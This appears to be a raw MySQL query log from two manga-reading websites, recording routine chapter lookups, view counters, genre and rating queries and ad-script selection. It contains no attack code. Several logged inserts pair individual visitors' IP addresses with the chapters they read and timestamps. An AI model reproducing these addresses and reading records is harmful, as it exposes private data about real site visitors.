330644362 Query select * FROM chapter_images where chapter_id = '11522' 330644362 Quit 330644363 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644363 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '104' and m.active = 1 330644363 Quit 330644364 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644364 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='104' and m.active = 1 AND (genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330644365 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644366 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644365 Quit 330644366 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17489' 330644366 Quit 330644367 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644367 Query select * FROM chapters where id = '17489' 330644367 Quit 330644368 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644368 Query select * FROM chapters where manga_id = '252' order by id desc 330644368 Quit 330644369 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644369 Query Update chapters set view=view+1 where id = '17489' 330644369 Quit 330644370 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644370 Query select * FROM chapters where id = '17489' 330644371 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644371 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17489' 330644370 Quit 330644371 Quit 330644372 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644372 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('252', '17489', '173.63.80.125', 'mangacherri.com', '2026-02-26 03:28:30', '2026-02-26 03:28:30') 330644372 Quit 330644373 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644373 Query select * FROM chapter_images where chapter_id = '17489' 330644373 Quit 330644374 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644374 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '252' and m.active = 1 330644374 Quit 330644375 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644375 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='252' and m.active = 1 AND (genres like '%Manhwa%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330644376 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644364 Quit 330644377 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644376 Quit 330644377 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644377 Quit 330644378 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644379 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644378 Quit 330644379 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644379 Quit 330644380 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644381 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644380 Quit 330644381 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644381 Quit 330644382 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644383 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644382 Quit 330644383 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644383 Quit 260225 19:28:31 330644375 Quit 330644384 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644385 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644384 Quit 330644385 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644385 Quit 330644386 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644387 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644386 Quit 330644387 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644387 Quit 330644388 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644389 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644388 Quit 330644389 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644389 Quit 330644390 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644391 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644390 Quit 330644391 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644391 Quit 330644392 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644393 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644392 Quit 330644393 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '347' and m.active = 1 330644393 Quit 330644394 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644394 Query select * FROM chapters where id = '347' 330644394 Quit 330644395 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644395 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330644395 Quit 330644396 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644396 Query Update chapters set view=view+1 where id = '347' 330644396 Quit 330644397 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644397 Query select * FROM chapters where id = '347' 330644398 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644398 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '347' and m.active = 1 330644397 Quit 330644398 Quit 330644399 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644399 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '347', '107.77.206.202', 'mangaberri.com', '2026-02-26 03:28:31', '2026-02-26 03:28:31') 330644399 Quit 330644400 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644400 Query select * FROM chapter_images where chapter_id = '347' 330644400 Quit 330644401 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644401 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330644401 Quit 330644402 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644402 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330644402 Quit 330644403 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644404 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644403 Quit 330644404 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644404 Quit 330644405 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644406 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644405 Quit 330644406 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644406 Quit 330644407 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644408 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644407 Quit 330644408 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644408 Quit 330644409 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644410 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644409 Quit 330644410 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644410 Quit 330644411 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644412 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644411 Quit 330644412 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1697' and m.active = 1 330644412 Quit 330644413 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644413 Query select * FROM chapters where id = '1697' 330644414 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644414 Query select * FROM chapters where manga_id = '98' order by display_priority ASC, id desc 330644413 Quit 330644414 Quit 330644415 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644415 Query Update chapters set view=view+1 where id = '1697' 330644415 Quit 330644416 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644416 Query select * FROM chapters where id = '1697' 330644416 Quit 330644417 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644417 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1697' and m.active = 1 330644417 Quit 330644418 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644418 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('98', '1697', '89.244.91.254', 'mangaberri.com', '2026-02-26 03:28:31', '2026-02-26 03:28:31') 330644418 Quit 330644419 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644419 Query select * FROM chapter_images where chapter_id = '1697' 330644419 Quit 330644420 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644420 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '98' and m.active = 1 330644420 Quit 330644421 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644421 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='98' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 260225 19:28:32 330644421 Quit 330644422 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644423 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644422 Quit 330644423 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644423 Quit 330644424 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644425 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644424 Quit 330644425 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644425 Quit 330644426 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644427 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644426 Quit 330644427 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644427 Quit 330644428 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644429 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644429 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644428 Quit 330644429 Quit 330644430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644430 Quit 330644431 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18027' 330644431 Quit 330644432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644432 Query select * FROM chapters where id = '18027' 330644432 Quit 330644433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644433 Query select * FROM chapters where manga_id = '376' order by id desc 330644434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644433 Quit 330644435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644434 Quit 330644436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644435 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where genres like '%Music%') as k where latest_chapter_id > 0 330644436 Query Update chapters set view=view+1 where id = '18027' 330644436 Quit 330644437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644437 Query select * FROM chapters where id = '18027' 330644437 Quit 330644438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644438 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18027' 330644438 Quit 330644439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644439 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('376', '18027', '216.244.66.235', 'mangacherri.com', '2026-02-26 03:28:32', '2026-02-26 03:28:32') 330644439 Quit 330644440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644440 Query select * FROM chapter_images where chapter_id = '18027' 330644441 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644442 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644441 Quit 330644442 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4741' and m.active = 1 330644442 Quit 330644443 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644443 Query select * FROM chapters where id = '4741' 330644443 Quit 330644444 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644444 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330644444 Quit 330644445 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644445 Query Update chapters set view=view+1 where id = '4741' 330644446 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644445 Quit 330644446 Query select * FROM chapters where id = '4741' 330644447 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644446 Quit 330644447 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4741' and m.active = 1 330644447 Quit 330644448 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644448 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4741', '47.79.206.68', 'mangaberri.com', '2026-02-26 03:28:32', '2026-02-26 03:28:32') 330644448 Quit 330644449 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644449 Query select * FROM chapter_images where chapter_id = '4741' 330644449 Quit 330644450 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644450 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330644450 Quit 330644451 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644451 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330644440 Quit 330644452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644452 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '376' and m.active = 1 330644451 Quit 330644453 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644454 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644453 Quit 330644454 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644454 Quit 330644455 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644456 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644456 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644455 Quit 330644456 Quit 330644457 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644458 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644457 Quit 330644458 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644458 Quit 330644459 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644460 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644459 Quit 330644460 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644460 Quit 330644452 Quit 330644461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644461 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='376' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Josei%' OR genres like '%Manhwa%' OR genres like '%Mystery%' OR genres like '%Romance%') ORDER BY RAND() limit 10 330644435 Quit 330644462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644462 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where m.genres like '%Music%' group by manga_id ORDER BY sum(view) DESC 330644462 Quit 330644463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644463 Quit 330644464 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644464 Quit 330644465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330644465 Quit 330644466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330644466 Quit 330644467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '210' order by created desc 330644467 Quit 330644468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330644468 Quit 330644469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330644469 Quit 330644470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330644470 Quit 330644471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330644471 Quit 330644472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330644472 Quit 330644461 Quit 330644473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644473 Quit 330644474 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644474 Quit 330644475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644475 Quit 330644476 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644476 Quit 330644477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644477 Quit 330644478 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644478 Quit 330644479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644479 Quit 330644480 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644480 Quit 330644481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644481 Quit 330644482 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18458' 330644482 Quit 330644483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644483 Query select * FROM chapters where id = '18458' 330644483 Quit 330644484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644484 Query select * FROM chapters where manga_id = '384' order by id desc 330644484 Quit 330644485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644485 Query Update chapters set view=view+1 where id = '18458' 330644485 Quit 330644486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644486 Query select * FROM chapters where id = '18458' 330644486 Quit 330644487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644487 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18458' 330644487 Quit 330644488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644488 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('384', '18458', '2409:4085:d1d:94f9:68f0:f55a:1cea:148', 'mangacherri.com', '2026-02-26 03:28:32', '2026-02-26 03:28:32') 330644488 Quit 330644489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644489 Query select * FROM chapter_images where chapter_id = '18458' 330644489 Quit 330644490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644490 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '384' and m.active = 1 330644490 Quit 330644491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644491 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='384' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 260225 19:28:33 330644492 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644493 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644492 Quit 330644493 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4741' and m.active = 1 330644493 Quit 330644494 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644494 Query select * FROM chapters where id = '4741' 330644494 Quit 330644495 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644495 Query select * FROM chapters where manga_id = '141' order by display_priority ASC, id desc 330644495 Quit 330644496 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644496 Query Update chapters set view=view+1 where id = '4741' 330644496 Quit 330644497 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644497 Query select * FROM chapters where id = '4741' 330644497 Quit 330644498 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644498 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '4741' and m.active = 1 330644498 Quit 330644499 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644499 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('141', '4741', '47.79.206.68', 'mangaberri.com', '2026-02-26 03:28:33', '2026-02-26 03:28:33') 330644499 Quit 330644500 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644500 Query select * FROM chapter_images where chapter_id = '4741' 330644500 Quit 330644501 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644501 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '141' and m.active = 1 330644501 Quit 330644502 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644502 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='141' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Martial Arts%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330644502 Quit 330644503 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644504 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644503 Quit 330644504 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644504 Quit 330644505 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644506 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644505 Quit 330644506 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644506 Quit 330644507 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644508 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644507 Quit 330644508 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644508 Quit 330644509 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644510 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330644509 Quit 330644510 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644510 Quit 330644491 Quit 330644511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644511 Quit 330644512 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330644512 Quit 330644513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644514 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330644513 Quit 330644514 Quit 330644515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330644515 Quit 330644516 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC 